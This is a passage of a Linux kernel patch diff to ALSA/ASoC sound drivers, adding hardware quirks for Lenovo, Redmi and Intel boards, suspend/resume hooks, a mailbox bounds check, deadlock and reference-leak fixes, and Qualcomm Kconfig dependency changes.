++				silent_stream_enable_i915(codec, per_pin);
++			}
++
++			param = snd_hda_codec_read(codec, per_pin->cvt_nid, 0,
++						   AC_VERB_GET_DIGI_CONVERT_1, 0);
++			if (!(param & (AC_DIG3_KAE << 16))) {
++				codec_dbg(codec, "HDMI: KAE: restore DIG3_KAE\n");
++				silent_stream_set_kae(codec, per_pin, true);
++			}
++		}
++	}
++
++	return res;
++}
++#endif
++
+ /* precondition and allocation for Intel codecs */
+ static int alloc_intel_hdmi(struct hda_codec *codec)
+ {
+@@ -3030,8 +3138,14 @@ static int patch_i915_adlp_hdmi(struct hda_codec *codec)
+ 	if (!res) {
+ 		spec = codec->spec;
+ 
+-		if (spec->silent_stream_type)
++		if (spec->silent_stream_type) {
+ 			spec->silent_stream_type = SILENT_STREAM_KAE;
++
++#ifdef CONFIG_PM
++			codec->patch_ops.resume = i915_adlp_hdmi_resume;
++			codec->patch_ops.suspend = i915_adlp_hdmi_suspend;
++#endif
++		}
+ 	}
+ 
+ 	return res;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index cf7c825078dc7..f5f640851fdcb 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10962,6 +10962,17 @@ static void alc897_fixup_lenovo_headset_mic(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc897_fixup_lenovo_headset_mode(struct hda_codec *codec,
++				     const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
++		spec->parse_flags |= HDA_PINCFG_HEADSET_MIC;
++		spec->gen.hp_automute_hook = alc897_hp_automute_hook;
++	}
++}
++
+ static const struct coef_fw alc668_coefs[] = {
+ 	WRITE_COEF(0x01, 0xbebe), WRITE_COEF(0x02, 0xaaaa), WRITE_COEF(0x03,    0x0),
+ 	WRITE_COEF(0x04, 0x0180), WRITE_COEF(0x06,    0x0), WRITE_COEF(0x07, 0x0f80),
+@@ -11045,6 +11056,8 @@ enum {
+ 	ALC897_FIXUP_LENOVO_HEADSET_MIC,
+ 	ALC897_FIXUP_HEADSET_MIC_PIN,
+ 	ALC897_FIXUP_HP_HSMIC_VERB,
++	ALC897_FIXUP_LENOVO_HEADSET_MODE,
++	ALC897_FIXUP_HEADSET_MIC_PIN2,
+ };
+ 
+ static const struct hda_fixup alc662_fixups[] = {
+@@ -11471,6 +11484,19 @@ static const struct hda_fixup alc662_fixups[] = {
+ 			{ }
+ 		},
+ 	},
++	[ALC897_FIXUP_LENOVO_HEADSET_MODE] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc897_fixup_lenovo_headset_mode,
++	},
++	[ALC897_FIXUP_HEADSET_MIC_PIN2] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x1a, 0x01a11140 }, /* use as headset mic, without its own jack detect */
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC897_FIXUP_LENOVO_HEADSET_MODE
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+@@ -11523,6 +11549,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x32cb, "Lenovo ThinkCentre M70", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cf, "Lenovo ThinkCentre M950", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32f7, "Lenovo ThinkCentre M90", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x3742, "Lenovo TianYi510Pro-14IOB", ALC897_FIXUP_HEADSET_MIC_PIN2),
+ 	SND_PCI_QUIRK(0x17aa, 0x38af, "Lenovo Ideapad Y550P", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Ideapad Y550", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x1849, 0x5892, "ASRock B150M", ALC892_FIXUP_ASROCK_MOBO),
+diff --git a/sound/soc/amd/acp/acp-platform.c b/sound/soc/amd/acp/acp-platform.c
+index 85a81add4ef9f..447612a7a7627 100644
+--- a/sound/soc/amd/acp/acp-platform.c
++++ b/sound/soc/amd/acp/acp-platform.c
+@@ -184,10 +184,6 @@ static int acp_dma_open(struct snd_soc_component *component, struct snd_pcm_subs
+ 
+ 	stream->substream = substream;
+ 
+-	spin_lock_irq(&adata->acp_lock);
+-	list_add_tail(&stream->list, &adata->stream_list);
+-	spin_unlock_irq(&adata->acp_lock);
+-
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+ 		runtime->hw = acp_pcm_hardware_playback;
+ 	else
+@@ -203,6 +199,10 @@ static int acp_dma_open(struct snd_soc_component *component, struct snd_pcm_subs
+ 
+ 	writel(1, ACP_EXTERNAL_INTR_ENB(adata));
+ 
++	spin_lock_irq(&adata->acp_lock);
++	list_add_tail(&stream->list, &adata->stream_list);
++	spin_unlock_irq(&adata->acp_lock);
++
+ 	return ret;
+ }
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index d9715bea965e1..1f0b5527c5949 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -213,6 +213,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Alienware m17 R5 AMD"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "TIMI"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/pcm512x.c b/sound/soc/codecs/pcm512x.c
+index 767463e82665c..89059a673cf09 100644
+--- a/sound/soc/codecs/pcm512x.c
++++ b/sound/soc/codecs/pcm512x.c
+@@ -1634,7 +1634,7 @@ int pcm512x_probe(struct device *dev, struct regmap *regmap)
+ 			if (val > 6) {
+ 				dev_err(dev, "Invalid pll-in\n");
+ 				ret = -EINVAL;
+-				goto err_clk;
++				goto err_pm;
+ 			}
+ 			pcm512x->pll_in = val;
+ 		}
+@@ -1643,7 +1643,7 @@ int pcm512x_probe(struct device *dev, struct regmap *regmap)
+ 			if (val > 6) {
+ 				dev_err(dev, "Invalid pll-out\n");
+ 				ret = -EINVAL;
+-				goto err_clk;
++				goto err_pm;
+ 			}
+ 			pcm512x->pll_out = val;
+ 		}
+@@ -1652,12 +1652,12 @@ int pcm512x_probe(struct device *dev, struct regmap *regmap)
+ 			dev_err(dev,
+ 				"Error: both pll-in and pll-out, or none\n");
+ 			ret = -EINVAL;
+-			goto err_clk;
++			goto err_pm;
+ 		}
+ 		if (pcm512x->pll_in && pcm512x->pll_in == pcm512x->pll_out) {
+ 			dev_err(dev, "Error: pll-in == pll-out\n");
+ 			ret = -EINVAL;
+-			goto err_clk;
++			goto err_pm;
+ 		}
+ 	}
+ #endif
+diff --git a/sound/soc/codecs/rt298.c b/sound/soc/codecs/rt298.c
+index a2ce52dafea84..cea26f3a02b6a 100644
+--- a/sound/soc/codecs/rt298.c
++++ b/sound/soc/codecs/rt298.c
+@@ -1166,6 +1166,13 @@ static const struct dmi_system_id force_combo_jack_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Geminilake")
+ 		}
+ 	},
++	{
++		.ident = "Intel Kabylake R RVP",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Kabylake Client platform")
++		}
++	},
+ 	{ }
+ };
+ 
+diff --git a/sound/soc/codecs/rt5670.c b/sound/soc/codecs/rt5670.c
+index ebac6caeb40ad..a230f441559a6 100644
+--- a/sound/soc/codecs/rt5670.c
++++ b/sound/soc/codecs/rt5670.c
+@@ -3311,8 +3311,6 @@ static int rt5670_i2c_probe(struct i2c_client *i2c)
+ 	if (ret < 0)
+ 		goto err;
+ 
+-	pm_runtime_put(&i2c->dev);
+-
+ 	return 0;
+ err:
+ 	pm_runtime_disable(&i2c->dev);
+diff --git a/sound/soc/codecs/wm8994.c b/sound/soc/codecs/wm8994.c
+index d3cfd3788f2ab..8fe9a75d12357 100644
+--- a/sound/soc/codecs/wm8994.c
++++ b/sound/soc/codecs/wm8994.c
+@@ -3853,7 +3853,12 @@ static irqreturn_t wm1811_jackdet_irq(int irq, void *data)
+ 	} else {
+ 		dev_dbg(component->dev, "Jack not detected\n");
+ 
++		/* Release wm8994->accdet_lock to avoid deadlock:
++		 * cancel_delayed_work_sync() takes wm8994->mic_work internal
++		 * lock and wm1811_mic_work takes wm8994->accdet_lock */
++		mutex_unlock(&wm8994->accdet_lock);
+ 		cancel_delayed_work_sync(&wm8994->mic_work);
++		mutex_lock(&wm8994->accdet_lock);
+ 
+ 		snd_soc_component_update_bits(component, WM8958_MICBIAS2,
+ 				    WM8958_MICB2_DISCH, WM8958_MICB2_DISCH);
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index c7b10bbfba7ea..0ddb6362fcc52 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -7,7 +7,7 @@
+ #include <linux/debugfs.h>
+ #include <linux/delay.h>
+ #include <linux/device.h>
+-#include <linux/gpio.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+@@ -1392,7 +1392,7 @@ static int wsa883x_probe(struct sdw_slave *pdev,
+ 	}
+ 
+ 	wsa883x->sd_n = devm_gpiod_get_optional(&pdev->dev, "powerdown",
+-						GPIOD_FLAGS_BIT_NONEXCLUSIVE);
++						GPIOD_FLAGS_BIT_NONEXCLUSIVE | GPIOD_OUT_HIGH);
+ 	if (IS_ERR(wsa883x->sd_n)) {
+ 		dev_err(&pdev->dev, "Shutdown Control GPIO not found\n");
+ 		ret = PTR_ERR(wsa883x->sd_n);
+@@ -1411,7 +1411,7 @@ static int wsa883x_probe(struct sdw_slave *pdev,
+ 	pdev->prop.simple_clk_stop_capable = true;
+ 	pdev->prop.sink_dpn_prop = wsa_sink_dpn_prop;
+ 	pdev->prop.scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
+-	gpiod_direction_output(wsa883x->sd_n, 1);
++	gpiod_direction_output(wsa883x->sd_n, 0);
+ 
+ 	wsa883x->regmap = devm_regmap_init_sdw(pdev, &wsa883x_regmap_config);
+ 	if (IS_ERR(wsa883x->regmap)) {
+diff --git a/sound/soc/generic/audio-graph-card.c b/sound/soc/generic/audio-graph-card.c
+index fe7cf972d44ce..5daa824a4ffcf 100644
+--- a/sound/soc/generic/audio-graph-card.c
++++ b/sound/soc/generic/audio-graph-card.c
+@@ -485,8 +485,10 @@ static int __graph_for_each_link(struct asoc_simple_priv *priv,
+ 			of_node_put(codec_ep);
+ 			of_node_put(codec_port);
+ 
+-			if (ret < 0)
++			if (ret < 0) {
++				of_node_put(cpu_ep);
+ 				return ret;
++			}
+ 
+ 			codec_port_old = codec_port;
+ 		}
+diff --git a/sound/soc/intel/Kconfig b/sound/soc/intel/Kconfig
+index d2ca710ac3fa4..ac799de4f7fda 100644
+--- a/sound/soc/intel/Kconfig
++++ b/sound/soc/intel/Kconfig
+@@ -177,7 +177,7 @@ config SND_SOC_INTEL_SKYLAKE_COMMON
+ 	select SND_HDA_DSP_LOADER
+ 	select SND_SOC_TOPOLOGY
+ 	select SND_SOC_INTEL_SST
+-	select SND_SOC_HDAC_HDA if SND_SOC_INTEL_SKYLAKE_HDAUDIO_CODEC
++	select SND_SOC_HDAC_HDA
+ 	select SND_SOC_ACPI_INTEL_MATCH
+ 	select SND_INTEL_DSP_CONFIG
+ 	help
+diff --git a/sound/soc/intel/avs/boards/rt298.c b/sound/soc/intel/avs/boards/rt298.c
+index b28d36872dcba..58c9d9edecf0a 100644
+--- a/sound/soc/intel/avs/boards/rt298.c
++++ b/sound/soc/intel/avs/boards/rt298.c
+@@ -6,6 +6,7 @@
+ //          Amadeusz Slawinski <amadeuszx.slawinski@linux.intel.com>
+ //
+ 
++#include <linux/dmi.h>
+ #include <linux/module.h>
+ #include <sound/jack.h>
+ #include <sound/pcm.h>
+@@ -14,6 +15,16 @@
+ #include <sound/soc-acpi.h>
+ #include "../../../codecs/rt298.h"
+ 
++static const struct dmi_system_id kblr_dmi_table[] = {
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Kabylake R DDR4 RVP"),
++		},
++	},
++	{}
++};
++
+ static const struct snd_kcontrol_new card_controls[] = {
+ 	SOC_DAPM_PIN_SWITCH("Headphone Jack"),
+ 	SOC_DAPM_PIN_SWITCH("Mic Jack"),
+@@ -96,9 +107,15 @@ avs_rt298_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_param
+ {
+ 	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+ 	struct snd_soc_dai *codec_dai = asoc_rtd_to_codec(rtd, 0);
++	unsigned int clk_freq;
+ 	int ret;
+ 
+-	ret = snd_soc_dai_set_sysclk(codec_dai, RT298_SCLK_S_PLL, 19200000, SND_SOC_CLOCK_IN);
++	if (dmi_first_match(kblr_dmi_table))
++		clk_freq = 24000000;
++	else
++		clk_freq = 19200000;
++
++	ret = snd_soc_dai_set_sysclk(codec_dai, RT298_SCLK_S_PLL, clk_freq, SND_SOC_CLOCK_IN);
+ 	if (ret < 0)
+ 		dev_err(rtd->dev, "Set codec sysclk failed: %d\n", ret);
+ 
+@@ -139,7 +156,10 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->platforms = platform;
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+-	dl->dai_fmt = SND_SOC_DAIFMT_DSP_A | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	if (dmi_first_match(kblr_dmi_table))
++		dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	else
++		dl->dai_fmt = SND_SOC_DAIFMT_DSP_A | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
+ 	dl->init = avs_rt298_codec_init;
+ 	dl->be_hw_params_fixup = avs_rt298_be_fixup;
+ 	dl->ops = &avs_rt298_ops;
+diff --git a/sound/soc/intel/avs/core.c b/sound/soc/intel/avs/core.c
+index bb0719c58ca49..4f93639ce4887 100644
+--- a/sound/soc/intel/avs/core.c
++++ b/sound/soc/intel/avs/core.c
+@@ -440,7 +440,7 @@ static int avs_pci_probe(struct pci_dev *pci, const struct pci_device_id *id)
+ 	if (bus->mlcap)
+ 		snd_hdac_ext_bus_get_ml_capabilities(bus);
+ 
+-	if (!dma_set_mask_and_coherent(dev, DMA_BIT_MASK(64)))
++	if (dma_set_mask_and_coherent(dev, DMA_BIT_MASK(64)))
+ 		dma_set_mask_and_coherent(dev, DMA_BIT_MASK(32));
+ 	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+diff --git a/sound/soc/intel/avs/ipc.c b/sound/soc/intel/avs/ipc.c
+index 020d85c7520de..306f0dc4eaf58 100644
+--- a/sound/soc/intel/avs/ipc.c
++++ b/sound/soc/intel/avs/ipc.c
+@@ -123,7 +123,10 @@ static void avs_dsp_recovery(struct avs_dev *adev)
+ 				if (!substream || !substream->runtime)
+ 					continue;
+ 
++				/* No need for _irq() as we are in nonatomic context. */
++				snd_pcm_stream_lock(substream);
+ 				snd_pcm_stop(substream, SNDRV_PCM_STATE_DISCONNECTED);
++				snd_pcm_stream_unlock(substream);
+ 			}
+ 		}
+ 	}
+@@ -192,7 +195,8 @@ static void avs_dsp_receive_rx(struct avs_dev *adev, u64 header)
+ 		/* update size in case of LARGE_CONFIG_GET */
+ 		if (msg.msg_target == AVS_MOD_MSG &&
+ 		    msg.global_msg_type == AVS_MOD_LARGE_CONFIG_GET)
+-			ipc->rx.size = msg.ext.large_config.data_off_size;
++			ipc->rx.size = min_t(u32, AVS_MAILBOX_SIZE,
++					     msg.ext.large_config.data_off_size);
+ 
+ 		memcpy_fromio(ipc->rx.data, avs_uplink_addr(adev), ipc->rx.size);
+ 		trace_avs_msg_payload(ipc->rx.data, ipc->rx.size);
+diff --git a/sound/soc/intel/boards/sof_es8336.c b/sound/soc/intel/boards/sof_es8336.c
+index 70713e4b07dc1..773e5d1d87d46 100644
+--- a/sound/soc/intel/boards/sof_es8336.c
++++ b/sound/soc/intel/boards/sof_es8336.c
+@@ -783,7 +783,7 @@ static int sof_es8336_remove(struct platform_device *pdev)
+ 	struct snd_soc_card *card = platform_get_drvdata(pdev);
+ 	struct sof_es8336_private *priv = snd_soc_card_get_drvdata(card);
+ 
+-	cancel_delayed_work(&priv->pcm_pop_work);
++	cancel_delayed_work_sync(&priv->pcm_pop_work);
+ 	gpiod_put(priv->gpio_speakers);
+ 	device_remove_software_node(priv->codec_dev);
+ 	put_device(priv->codec_dev);
+diff --git a/sound/soc/intel/skylake/skl.c b/sound/soc/intel/skylake/skl.c
+index 3312b57e3c0cb..7f058acd221f0 100644
+--- a/sound/soc/intel/skylake/skl.c
++++ b/sound/soc/intel/skylake/skl.c
+@@ -1116,7 +1116,10 @@ static void skl_shutdown(struct pci_dev *pci)
+ 	if (!skl->init_done)
+ 		return;
+ 
+-	snd_hdac_stop_streams_and_chip(bus);
++	snd_hdac_stop_streams(bus);
++	snd_hdac_ext_bus_link_power_down_all(bus);
++	skl_dsp_sleep(skl->dsp);
++
+ 	list_for_each_entry(s, &bus->stream_list, list) {
+ 		stream = stream_to_hdac_ext_stream(s);
+ 		snd_hdac_ext_stream_decouple(bus, stream, false);
+diff --git a/sound/soc/mediatek/common/mtk-btcvsd.c b/sound/soc/mediatek/common/mtk-btcvsd.c
+index d884bb7c0fc74..1c28b41e43112 100644
+--- a/sound/soc/mediatek/common/mtk-btcvsd.c
++++ b/sound/soc/mediatek/common/mtk-btcvsd.c
+@@ -1038,11 +1038,9 @@ static int mtk_pcm_btcvsd_copy(struct snd_soc_component *component,
+ 	struct mtk_btcvsd_snd *bt = snd_soc_component_get_drvdata(component);
+ 
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+-		mtk_btcvsd_snd_write(bt, buf, count);
++		return mtk_btcvsd_snd_write(bt, buf, count);
+ 	else
+-		mtk_btcvsd_snd_read(bt, buf, count);
+-
+-	return 0;
++		return mtk_btcvsd_snd_read(bt, buf, count);
+ }
+ 
+ /* kcontrol */
+diff --git a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+index dcaeeeb8aac70..bc155dd937e0b 100644
+--- a/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
++++ b/sound/soc/mediatek/mt8173/mt8173-afe-pcm.c
+@@ -1070,16 +1070,6 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 
+ 	afe->dev = &pdev->dev;
+ 
+-	irq_id = platform_get_irq(pdev, 0);
+-	if (irq_id <= 0)
+-		return irq_id < 0 ? irq_id : -ENXIO;
+-	ret = devm_request_irq(afe->dev, irq_id, mt8173_afe_irq_handler,
+-			       0, "Afe_ISR_Handle", (void *)afe);
+-	if (ret) {
+-		dev_err(afe->dev, "could not request_irq\n");
+-		return ret;
+-	}
+-
+ 	afe->base_addr = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(afe->base_addr))
+ 		return PTR_ERR(afe->base_addr);
+@@ -1185,6 +1175,16 @@ static int mt8173_afe_pcm_dev_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_cleanup_components;
+ 
++	irq_id = platform_get_irq(pdev, 0);
++	if (irq_id <= 0)
++		return irq_id < 0 ? irq_id : -ENXIO;
++	ret = devm_request_irq(afe->dev, irq_id, mt8173_afe_irq_handler,
++			       0, "Afe_ISR_Handle", (void *)afe);
++	if (ret) {
++		dev_err(afe->dev, "could not request_irq\n");
++		goto err_pm_disable;
++	}
++
+ 	dev_info(&pdev->dev, "MT8173 AFE driver initialized.\n");
+ 	return 0;
+ 
+diff --git a/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c b/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c
+index 12f40c81b101e..f803f121659de 100644
+--- a/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c
++++ b/sound/soc/mediatek/mt8173/mt8173-rt5650-rt5514.c
+@@ -200,14 +200,16 @@ static int mt8173_rt5650_rt5514_dev_probe(struct platform_device *pdev)
+ 	if (!mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[0].of_node) {
+ 		dev_err(&pdev->dev,
+ 			"Property 'audio-codec' missing or invalid\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 	mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[1].of_node =
+ 		of_parse_phandle(pdev->dev.of_node, "mediatek,audio-codec", 1);
+ 	if (!mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[1].of_node) {
+ 		dev_err(&pdev->dev,
+ 			"Property 'audio-codec' missing or invalid\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 	mt8173_rt5650_rt5514_codec_conf[0].dlc.of_node =
+ 		mt8173_rt5650_rt5514_dais[DAI_LINK_CODEC_I2S].codecs[1].of_node;
+@@ -216,6 +218,7 @@ static int mt8173_rt5650_rt5514_dev_probe(struct platform_device *pdev)
+ 
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+ 
++out:
+ 	of_node_put(platform_node);
+ 	return ret;
+ }
+diff --git a/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c b/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c
+index a860852236779..48c14be5e3db7 100644
+--- a/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c
++++ b/sound/soc/mediatek/mt8183/mt8183-mt6358-ts3a227-max98357.c
+@@ -677,8 +677,10 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	card = (struct snd_soc_card *)of_device_get_match_data(&pdev->dev);
+-	if (!card)
++	if (!card) {
++		of_node_put(platform_node);
+ 		return -EINVAL;
++	}
+ 	card->dev = &pdev->dev;
+ 
+ 	ec_codec = of_parse_phandle(pdev->dev.of_node, "mediatek,ec-codec", 0);
+@@ -767,8 +769,10 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	priv = devm_kzalloc(&pdev->dev, sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
++	if (!priv) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
+ 	snd_soc_card_set_drvdata(card, priv);
+ 
+@@ -776,7 +780,8 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->pinctrl)) {
+ 		dev_err(&pdev->dev, "%s devm_pinctrl_get failed\n",
+ 			__func__);
+-		return PTR_ERR(priv->pinctrl);
++		ret = PTR_ERR(priv->pinctrl);
++		goto out;
+ 	}
+ 
+ 	for (i = 0; i < PIN_STATE_MAX; i++) {
+@@ -809,6 +814,7 @@ mt8183_mt6358_ts3a227_max98357_dev_probe(struct platform_device *pdev)
+ 
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+ 
++out:
+ 	of_node_put(platform_node);
+ 	of_node_put(ec_codec);
+ 	of_node_put(hdmi_codec);
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c
+index cfca6bdee8345..90ec0d0a83927 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-da7219-max98357.c
+@@ -192,7 +192,7 @@ static int mt8186_mt6366_da7219_max98357_hdmi_init(struct snd_soc_pcm_runtime *r
+ 	struct mt8186_mt6366_da7219_max98357_priv *priv = soc_card_data->mach_priv;
+ 	int ret;
+ 
+-	ret = mt8186_dai_i2s_set_share(afe, "I2S3", "I2S2");
++	ret = mt8186_dai_i2s_set_share(afe, "I2S2", "I2S3");
+ 	if (ret) {
+ 		dev_err(rtd->dev, "Failed to set up shared clocks\n");
+ 		return ret;
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+index 2414c5b77233c..60fa55d0c91f0 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+@@ -168,7 +168,7 @@ static int mt8186_mt6366_rt1019_rt5682s_hdmi_init(struct snd_soc_pcm_runtime *rt
+ 	struct mt8186_mt6366_rt1019_rt5682s_priv *priv = soc_card_data->mach_priv;
+ 	int ret;
+ 
+-	ret = mt8186_dai_i2s_set_share(afe, "I2S3", "I2S2");
++	ret = mt8186_dai_i2s_set_share(afe, "I2S2", "I2S3");
+ 	if (ret) {
+ 		dev_err(rtd->dev, "Failed to set up shared clocks\n");
+ 		return ret;
+diff --git a/sound/soc/pxa/mmp-pcm.c b/sound/soc/pxa/mmp-pcm.c
+index 5d520e18e512f..99b245e3079a2 100644
+--- a/sound/soc/pxa/mmp-pcm.c
++++ b/sound/soc/pxa/mmp-pcm.c
+@@ -98,7 +98,7 @@ static bool filter(struct dma_chan *chan, void *param)
+ 
+ 	devname = kasprintf(GFP_KERNEL, "%s.%d", dma_data->dma_res->name,
+ 		dma_data->ssp_id);
+-	if ((strcmp(dev_name(chan->device->dev), devname) == 0) &&
++	if (devname && (strcmp(dev_name(chan->device->dev), devname) == 0) &&
+ 		(chan->chan_id == dma_data->dma_res->start)) {
+ 		found = true;
+ 	}
+diff --git a/sound/soc/qcom/Kconfig b/sound/soc/qcom/Kconfig
+index 8c7398bc1ca89..96a6d4731e6fd 100644
+--- a/sound/soc/qcom/Kconfig
++++ b/sound/soc/qcom/Kconfig
+@@ -2,6 +2,7 @@
+ menuconfig SND_SOC_QCOM
+ 	tristate "ASoC support for QCOM platforms"
+ 	depends on ARCH_QCOM || COMPILE_TEST
++	imply SND_SOC_QCOM_COMMON
+ 	help
+ 	  Say Y or M if you want to add support to use audio devices
+ 	  in Qualcomm Technologies SOC-based platforms.
+@@ -59,13 +60,14 @@ config SND_SOC_STORM
+ config SND_SOC_APQ8016_SBC
+ 	tristate "SoC Audio support for APQ8016 SBC platforms"
+ 	select SND_SOC_LPASS_APQ8016
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8016 SOC-based systems.
+ 	  Say Y if you want to use audio devices on MI2S.
+ 
+ config SND_SOC_QCOM_COMMON
++	depends on SOUNDWIRE
+ 	tristate
+ 
+ config SND_SOC_QDSP6_COMMON
+@@ -142,7 +144,7 @@ config SND_SOC_MSM8996
+ 	depends on QCOM_APR
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8096 SoC-based systems.
+@@ -153,7 +155,7 @@ config SND_SOC_SDM845
+ 	depends on QCOM_APR && I2C && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	select SND_SOC_RT5663
+ 	select SND_SOC_MAX98927
+ 	imply SND_SOC_CROS_EC_CODEC
+@@ -167,7 +169,7 @@ config SND_SOC_SM8250
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SM8250 SoC-based systems.
+@@ -178,7 +180,7 @@ config SND_SOC_SC8280XP
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SC8280XP SoC-based systems.
+@@ -188,7 +190,7 @@ config SND_SOC_SC7180
+ 	tristate "SoC Machine driver for SC7180 boards"
+ 	depends on I2C && GPIOLIB
+ 	depends on SOUNDWIRE || SOUNDWIRE=n
+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7180
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_RT5682_I2C
+@@ -202,7 +204,7 @@ config SND_SOC_SC7180
+ config SND_SOC_SC7280
+ 	tristate "SoC Machine driver for SC7280 boards"
+ 	depends on I2C && SOUNDWIRE
